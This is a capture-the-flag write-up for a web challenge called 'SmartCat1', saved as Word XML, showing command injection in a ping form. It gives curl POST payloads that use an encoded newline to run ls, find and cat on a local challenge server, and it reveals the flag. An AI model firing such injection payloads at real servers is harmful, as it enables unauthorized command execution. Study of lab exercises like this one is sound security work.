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98999786376953"/>
          <w:szCs w:val="51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98999786376953"/>
          <w:szCs w:val="51.98999786376953"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WEB: SmartCat1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763671875" w:line="272.7422904968262" w:lineRule="auto"/>
        <w:ind w:left="5.4974365234375" w:right="466.1572265625" w:hanging="3.078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APP allows ping a given IP. However, we are required to find some info in the host. For example, if we ping the local host, the interface prints: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6367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93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422904968262" w:lineRule="auto"/>
        <w:ind w:left="11.874542236328125" w:right="12.69287109375" w:hanging="2.85873413085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Good. We need to find a way to inspect the host: a possible intuition is that no input sanitizer is implemented.The idea is to execute a ping and then a new command, such as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, without inserting bad characters if, in case, the sanitizer is implemented.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72.7422904968262" w:lineRule="auto"/>
        <w:ind w:left="11.874542236328125" w:right="11.866455078125" w:hanging="9.4557189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suggestion is to use the curl program. For example, let’s try to replicate the previous message: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787.01690673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curl "http://127.0.0.1:809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" -X POST --data "dest=127.0.0.1"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72.7422904968262" w:lineRule="auto"/>
        <w:ind w:left="5.93719482421875" w:right="0" w:hanging="5.937194824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With this line we can achieve the same result. Now, we should insert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somehow. The new line character is 0x0A, so we can try with it: note that we need to use the url format correspondent, which is %0a.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40" w:lineRule="auto"/>
        <w:ind w:left="725.9371948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curl "http://127.0.0.1:8090" -X POST --data "dest=127.0.0.10%0als"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2.41882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output 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0290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422904968262" w:lineRule="auto"/>
        <w:ind w:left="5.4974365234375" w:right="1.56982421875" w:firstLine="12.3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It worked! We now that the current path on which the application is running on, contains two elements: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376.49246215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● Index.py : a python file;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376.49246215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● there : a folder.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We can try to explore the “there” folder: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5.9371948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curl "http://127.0.0.1:8090" -X POST --data "dest=127.0.0.10%0als there"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72.7422904968262" w:lineRule="auto"/>
        <w:ind w:left="5.93719482421875" w:right="2.635498046875" w:firstLine="8.136291503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Not a good idea … the space is sanitized and thus we receive a “bad character in dest” message (same if we use %20). We need a way to inspect the folder without using the space character. We can use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77001953125" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="725.9371948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curl "http://127.0.0.1:8090" -X POST --data "dest=127.0.0.10%0afind"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79936695098877" w:lineRule="auto"/>
        <w:ind w:left="9.01580810546875" w:right="8.7646484375" w:firstLine="18.345336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76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Good! Let’s open the files inside the last path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65625" w:line="272.7422904968262" w:lineRule="auto"/>
        <w:ind w:left="4.178009033203125" w:right="4.322509765625" w:firstLine="1.7591857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curl "http://127.0.0.1:8090" -X POST --data "dest=127.0.0.10%0acat&lt;there/is/your/flag/or/maybe/not/what/do/you/think/really/please/tell/me/ seriously/though/here/is/the/flag"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2.41882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The flag is revealed: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725.0576782226562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89999771118164"/>
          <w:szCs w:val="21.98999977111816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INS{warm_kitty_smelly_kitty_flush_flush_flush}</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="2970" w:top="1415.10009765625" w:left="1442.6388549804688" w:right="1401.23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wtfuklqvQtZmOg2s9iekZkowg==">CgMxLjA4AHIhMW9hQXR0WVBqSTE0VDktSndOdlpoenJORGZkN0dpbHgz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